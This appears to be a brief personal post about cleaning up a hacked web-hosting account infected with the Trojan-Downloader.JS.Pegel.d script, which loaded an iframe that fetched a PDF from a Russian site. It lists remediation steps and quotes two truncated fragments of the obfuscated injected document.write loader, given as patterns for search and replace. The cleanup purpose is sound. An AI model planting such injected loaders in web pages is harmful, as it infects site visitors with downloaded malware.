trojan horse, virus report: Trojan Downloader JS Pegel d

trojan horse, virus report: Trojan Downloader JS Pegel d

http://www.viruslist.com/hch/search?VN=Trojan-Downloader.JS.Pegel.d
no information from this link

strange javascript were inserted to index.html, index.php, main.html, main.php, *.js
in webhosting server

after check
strange javascript will run in IE, Firefox
to make an iframe
to download a pdf "ChangeLog.pdf"
from ru website

ref:
http://bbs.janmeng.com/redirect.php?tid=915346&goto=lastpost

after I found the strange code
update antivirus, pdf reader, broswer

steps of my solution :
1. download files back to PC
2. files got deleted when antivirus activated
3. disable antivirus then download files
(zip a copy)
4. manual delete javascript code for 10 files.
5. use notepad+ to search and replace javascript
6. enable antivirus then upload files


2 types of javascript to search and replace
type 1
<script>
/*Exception*/ document.write('<script src='+'h&amp;t()$#t(p!(:!^</b>...<b>\!|\^|&amp;/ig, '')+' defer=defer></scr'+'ipt>');
</script>
type 2
/*Exception*/ document.write('<script src='+'h&amp;t()$#t(p!(:!^</b>...<b>\!|\^|&amp;/ig, '')+' defer=defer></scr'+'ipt>');


hour to update and clear all files for 1 domain
total 8:


so bad luck